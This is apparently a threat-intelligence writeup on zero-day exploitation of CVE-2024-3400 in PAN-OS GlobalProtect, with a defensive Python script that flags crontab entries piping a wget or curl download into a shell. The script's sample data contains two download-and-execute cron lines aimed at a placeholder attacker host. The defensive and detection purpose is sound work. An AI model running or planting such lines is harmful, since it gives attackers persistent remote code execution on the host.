
Palo Alto Networks PAN-OS Zero-Day Exploitation


On April 10, 2024, Volexity identified zero-day exploitation of a vulnerability found within the GlobalProtect feature of Palo Alto Networks PAN-OS at one of its network security monitoring (NSM) customers. Volexity received alerts regarding suspect network traffic emanating from the customer’s firewall. A subsequent investigation determined the device had been compromised. The following day, April 11, 2024, Volexity observed further, identical exploitation at another one of its NSM customers by the same threat actor.

Palo Alto Networks has since issued an advisory for CVE-2024-3400 that includes information regarding a threat protection signature released to customers, as well as a timeline for a fix, which at the time of writing is expected April 14, 2024. Volexity used telemetry from its own network security sensors, client endpoint detection and response (EDR) software, and forensic data collected from multiple systems to paint a thorough picture of the attacker's actions in the incidents investigated. The initial persistence mechanism set up by the threat actor, tracked as UTA0218, involved configuring a cron job that would use wget to retrieve a payload from an attacker-controlled URL, with its output written to stdout and piped to bash for execution.
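A defender reviewing a firewall or host for this kind of persistence can grep crontabs for the download-and-pipe-to-shell pattern described above. The following is an added example (not code from Volexity or Palo Alto Networks) that scans constructed crontab lines; the hostname and payload paths are placeholders, not indicators from the incident.

```python
import re
from typing import Dict, List

# Constructed sample crontab (not from the incident); hosts and paths are placeholders.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
* * * * * wget -qO- http://EXAMPLE-ATTACKER-HOST/payload.sh | bash
*/5 * * * * curl -s https://EXAMPLE-ATTACKER-HOST/x | sh
30 2 * * * /opt/backup.sh >> /var/log/backup.log 2>&1
"""

# A remote fetch tool in the command line ...
FETCH_TOOLS = re.compile(r"\b(wget|curl)\b")
# ... whose output is piped straight into a shell (sh, bash, dash, zsh, or /bin/bash).
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/\S*/)?(?:ba|da|z)?sh\b")


def scan_crontab(text: str) -> List[Dict[str, str]]:
    """Return user-crontab entries that fetch a remote payload and pipe it to a shell."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # blank line or comment
        if stripped.startswith("@"):  # @reboot, @hourly, ... <command>
            schedule, _, command = stripped.partition(" ")
        else:  # five time fields followed by the command
            parts = stripped.split(None, 5)
            if len(parts) < 6:
                continue  # malformed or variable assignment such as PATH=...
            schedule, command = " ".join(parts[:5]), parts[5]
        if FETCH_TOOLS.search(command) and PIPE_TO_SHELL.search(command):
            findings.append({"line": str(lineno), "schedule": schedule, "command": command})
    return findings


if __name__ == "__main__":
    for hit in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {hit['line']} [{hit['schedule']}]: {hit['command']}")
```

System-wide crontabs (/etc/crontab, /etc/cron.d) carry an extra user field before the command, so adjust the field count when pointing this at those files.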
